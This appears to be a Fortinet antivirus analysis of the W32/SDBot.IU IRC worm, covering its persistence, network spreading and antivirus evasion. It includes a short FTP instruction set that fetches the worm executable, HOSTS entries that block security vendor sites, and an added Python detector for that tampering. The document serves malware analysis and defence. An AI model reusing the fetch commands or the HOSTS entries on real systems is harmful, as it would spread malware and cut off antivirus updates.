W32/SDBot.IU!worm
Analysis
Specifics
This virus is a 32-bit executable with a packed file size of 68,611 bytes. It contains instructions to copy itself to other systems across a network (LAN/WAN) and to respond to instructions received from a malicious user after first connecting to an IRC server and channel. When the virus copies itself to other systems, the file is saved into the System32 folder as "cool.exe". The file is then executed remotely, which copies itself as "syslog32.exe" in the same folder.
This virus may terminate security applications that match a hard-coded list. It may also function as a small FTP server.
Loading At Windows Startup
If the virus is run, it copies itself to the local system into the drivers folder as "ntsyst32.exe" and sets registry entries to load the virus as a service at each Windows startup -
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"Microsoft System Checkup" = wnetlogin.exe
"NT Logging Serivce" = syslog32.exe
IRC Connection
The virus attempts to connect to a common IRC server named "irc.undernet.org", using destination TCP port 6667. The connection is used mainly for communication messages; however, the open port can be used by a malicious user to send instructions to the virus.
Network Shares Infection Method
The virus may attempt to seek out other machines on a network and penetrate them by using a dictionary attack to log on to the target system, an RPC DCOM exploit, or an LSASS exploit.
If a system is vulnerable, the virus attempts to copy itself to the target into these shares and hard-coded locations -
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
C:\WINDOWS\Start Menu\Programs\Startup
C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup
C$\WINNT\Profiles\All Users\Start Menu\Programs\Startup
C$\WINDOWS\Start Menu\Programs\Startup
C$\Documents and Settings\All Users\Start Menu\Programs\Startup
C$
File Retrieval
This virus may attempt to download files from hard-coded websites. For instance, instructions in the virus attempt to connect to 'maniacu2.homeftp.net', retrieve the file "cool2.exe" and then execute it. At the time of this writing, the file and server were not accessible.
When the virus begins targeting other systems, it may attempt to retrieve the downloaded file as "cool" using the following FTP instruction set -
open <infected host> 10051
h
h
get cool.exe
cool.exe
HOSTS File Overwrite
The virus attempts to block the system and user from accessing certain antivirus websites by overwriting the HOSTS file with invalid resolution details, as in this example -
127.0.0.1 www.trendmicro.com
127.0.0.1 trendmicro.com
127.0.0.1 rads.mcafee.com
127.0.0.1 customer.symantec.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 updates.symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 www.nai.com
127.0.0.1 nai.com
127.0.0.1 secure.nai.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 www.my-etrust.com
127.0.0.1 my-etrust.com
127.0.0.1 mast.mcafee.com
127.0.0.1 ca.com
127.0.0.1 www.ca.com
127.0.0.1 networkassociates.com
127.0.0.1 www.networkassociates.com
127.0.0.1 avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 kaspersky.com
127.0.0.1 www.f-secure.com
127.0.0.1 f-secure.com
127.0.0.1 viruslist.com
127.0.0.1 www.viruslist.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mcafee.com
127.0.0.1 www.mcafee.com
127.0.0.1 sophos.com
127.0.0.1 www.sophos.com
127.0.0.1 symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 www.symantec.com
The purpose of doing this is to prevent the infected host from updating its Antivirus software.
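As an added example (not part of the Fortinet analysis), the following Python script parses a HOSTS file and flags entries that point the security-vendor domains listed above at a loopback address; it also treats the unspecified address 0.0.0.0 as a sinkhole, which goes slightly beyond the 127.0.0.1 entries shown. The HOSTS content embedded in it is constructed sample data, and the vendor suffix list is taken from the entries quoted above.

```python
import ipaddress

# Constructed sample HOSTS content modelled on the entries quoted in the analysis,
# mixed with legitimate lines that a clean system might carry.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
127.0.0.1 www.trendmicro.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 update.symantec.com   # trailing comment
0.0.0.0 download.mcafee.com
192.168.1.10    fileserver.corp.example
"""

# Vendor domains from the HOSTS example above; a sinkholed name under any of
# these suffixes is a sign of the tampering described in this section.
WATCHED_SUFFIXES = ("trendmicro.com", "mcafee.com", "symantec.com", "nai.com",
                    "my-etrust.com", "ca.com", "networkassociates.com", "avp.com",
                    "kaspersky.com", "f-secure.com", "viruslist.com",
                    "symantecliveupdate.com", "sophos.com")

def parse_hosts(text):
    """Yield (ip, hostname) pairs from HOSTS text, skipping comments and blanks."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        for name in fields[1:]:
            yield fields[0], name.lower()

def is_sinkhole(ip):
    """True for loopback (127.x, ::1) or unspecified (0.0.0.0, ::) addresses."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_unspecified

def matches_vendor(name):
    return any(name == s or name.endswith("." + s) for s in WATCHED_SUFFIXES)

def find_blocked_vendor_hosts(text):
    """Return sorted vendor hostnames that the HOSTS text sinkholes."""
    return sorted({name for ip, name in parse_hosts(text)
                   if name != "localhost" and is_sinkhole(ip) and matches_vendor(name)})

if __name__ == "__main__":
    for host in find_blocked_vendor_hosts(SAMPLE_HOSTS):
        print("suspicious HOSTS entry:", host)
```

On a live Windows system the same function can be run over the contents of %SystemRoot%\System32\drivers\etc\hosts; any hit means antivirus updates are being silently blocked and the file should be restored from a known-good copy.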
Miscellaneous
The virus contains these strings in its unpacked form -
---begin--- AV Guy READ: where do u come up with names like Donk.B? Put a reprezentative name like windr0ne ----end----
Windrone 8.1 final by Romanian 1337 hackers
Recommended Action
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
- Using the FortiGate manager, block internal-to-external and external-to-internal access on TCP ports 6667 and 10051 - it may be necessary to define the ports as a service prior to blocking
Telemetry
Detection Availability

| Product | Database |
|---|---|
| FortiGate | Extreme |
| FortiClient | Extended |
| FortiMail | Extended |
| FortiSandbox | Extended |
| FortiWeb | Extended |
| Web Application Firewall | Extended |
| FortiIsolator | Extended |
| FortiDeceptor | Extended |
| FortiEDR | |